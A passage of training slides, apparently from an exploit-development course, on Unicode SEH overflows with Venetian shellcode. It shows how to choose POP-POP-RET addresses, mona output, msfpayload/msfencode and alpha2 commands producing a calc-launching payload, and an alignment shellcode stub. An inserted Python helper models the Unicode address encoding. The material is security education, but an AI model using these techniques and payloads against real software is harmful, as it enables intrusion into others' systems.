Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
8. @ajinabraham
nSEH
• JMP TO SHELLCODE
  We can't use an actual JMP. We walk to the shellcode instead, using
  single-byte instructions along with NOP-like harmless aligning
  instructions (Venetian shellcode).
SEH
• POP,POP,RET SEQUENCE (the address will be of the format 0x00aa00bb)
Shellcode
• UNICODE SHELLCODE (the shellcode is Decoder + Shellcode, so we have to
  point a register to the decoder and jump to it. We use the Venetian
  shellcode technique for alignment.)
[Diagram: layout of nSEH, SEH and shellcode, steps numbered 1-3, with EIP]
9. @ajinabraham
nSEH
• JMP TO SHELLCODE
  We can't use an actual JMP. We walk to the shellcode instead, using
  single-byte instructions along with NOP-like harmless aligning
  instructions (Venetian shellcode).
• You need to try out the candidates (popad, inc eax, or the choice of
  NOP-like bytes) and pick the working one, but you can check it only
  after you have chosen the SEH address.
• Example
  "\x61\x41" implies 61       -> POPAD
                     00 41 00 -> ADD BYTE PTR DS:[ECX],AL
  "\x41\x71" implies 41       -> INC ECX
                     00 71 00 -> ADD BYTE PTR DS:[ECX],DH
• 1-byte instructions
  41 : INC ECX
  61 : POPAD
10. @ajinabraham
SEH
• POP,POP,RET SEQUENCE (the address will be of the format 0x00aa00bb)
Selecting a suitable address
• The address range should be between 0x00 and 0x7f.
• Choose the address from modules without SAFESEH.
• The address should be in the format 0x00aa00bb.
• Say you choose "0x004d0041"; then specify "\x41\x4d" (little endian) in the shellcode.
• The "00" bytes will be prepended by the program during execution.
• Even if we get suitable addresses, not all of them work. You have to try each address
  to find the one that doesn't harm the execution flow and reaches our shellcode.
!mona seh -cp unicode
Suitable addresses:
0x004b00cb
0x004a0041
0x004a0059
0x004d0041
0x004100f2
0x004c0020
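The Venetian byte pairs on slide 9 and the 0x00aa00bb address rule on slide 10 both follow from the same ANSI-to-UTF-16LE expansion. The following Python is an added example, not code from the slides or from the megaprimer; it models that expansion so you can check why "\x41\x4d" lands in memory as 0x004d0041, which candidate addresses have the required shape, and what instruction the inserted 00 byte forms with a padding byte. The function names and the candidate list are constructed for this example.

```python
import struct

REGS8 = ["AL", "CL", "DL", "BL", "AH", "CH", "DH", "BH"]
REGS32 = ["EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI"]


def unicode_expand(data: bytes) -> bytes:
    """Model of the ANSI->UTF-16LE conversion the slides rely on: every input
    byte b becomes the code unit b 00 in memory. Exact for 0x00-0x7f; what
    happens to higher bytes depends on the program's code page (assumption)."""
    return b"".join(bytes([b, 0x00]) for b in data)


def classify_address(addr: int) -> dict:
    """Apply the 'Selecting a suitable address' criteria to a 32-bit address:
    it must have the shape 0x00aa00bb, and the conservative choice keeps both
    non-zero bytes in the 0x00-0x7f range."""
    lo, hi = addr & 0xFF, (addr >> 16) & 0xFF
    return {
        "shape_ok": (addr & 0xFF00FF00) == 0,
        "conservative": lo <= 0x7F and hi <= 0x7F,
    }


def encode_address(addr: int) -> bytes:
    """The two bytes to place in the input so that, after expansion, the
    little-endian dword in memory equals addr (0x004d0041 -> b"\\x41\\x4d")."""
    if not classify_address(addr)["shape_ok"]:
        raise ValueError(f"0x{addr:08x} does not have the 0x00aa00bb shape")
    return bytes([addr & 0xFF, (addr >> 16) & 0xFF])


def dword_after_expansion(two_bytes: bytes) -> int:
    """Read back the dword that the two expanded bytes form in memory."""
    return struct.unpack("<I", unicode_expand(two_bytes))[0]


def decode_padding(modrm: int):
    """Decode the ADD r/m8, r8 instruction (opcode 00) that an inserted 00 byte
    forms with the following padding byte and the next 00, e.g.
    00 41 00 -> ADD BYTE PTR DS:[ECX],AL. Only the mod=01 (disp8 = 00) form
    without a SIB byte is modelled; anything else returns None."""
    mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
    if mod != 1 or rm == 4:
        return None
    return f"ADD BYTE PTR DS:[{REGS32[rm]}],{REGS8[reg]}"


# Constructed candidate list in the style of the slide's mona output.
CANDIDATES = [0x004B00CB, 0x004A0041, 0x004A0059, 0x004D0041, 0x004100F2, 0x004C0020]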
11. @ajinabraham
• Generate the shellcode with Metasploit alone or use SkyLined's alpha2 encoder.
msfpayload windows/exec CMD=calc R | msfencode -e x86/unicode_upper BufferRegister=EAX -t raw
msfpayload windows/exec CMD=calc R | ./alpha2 eax --unicode --uppercase
• We need to point a register at our shellcode and jump to it. For alignment we use the
  Venetian shellcode technique.
• We will use EAX to hold our shellcode.
Shellcode
• UNICODE SHELLCODE (the shellcode is Decoder + Shellcode, so we have to point a
  register to the decoder and jump to it. We use the Venetian shellcode technique
  for alignment.)
[Diagram: Shellcode = Decoder + Shellcode]
13. @ajinabraham
• You will need to properly align the set of instructions with Venetian shellcode so that it
  won't break at execution time.
• You should be creative. You should analyze the execution flow in the debugger.
• At times we need to add extra Venetian shellcode at the beginning and end to properly align everything.
• So, for example, the previous code after adding some Venetian shellcode may look like this.
"\x58"          pop eax              # take the value of ebp and pop it into eax
"\x71"                               # Venetian padding
"\x05\xbb\xaa"  add eax,0xaa00bb00   # \
"\x71"                               # Venetian padding > add and subtract: the net value X of 0xaa00bb00 and 0xcc00dd00 (mod 2^32) is what effectively gets added to EAX
"\x2d\xdd\xcc"  sub eax,0xcc00dd00   # /
"\x71"                               # Venetian padding
"\x50"          push eax             # push the new value of EAX onto the stack
"\x71"                               # Venetian padding
"\xC3"          ret                  # return to the shellcode address held in EAX, loading it into EIP
• Add sufficient NOP-like instructions to reach our shellcode.
• An MSF pattern can be used, but it is better to just try it out yourself manually.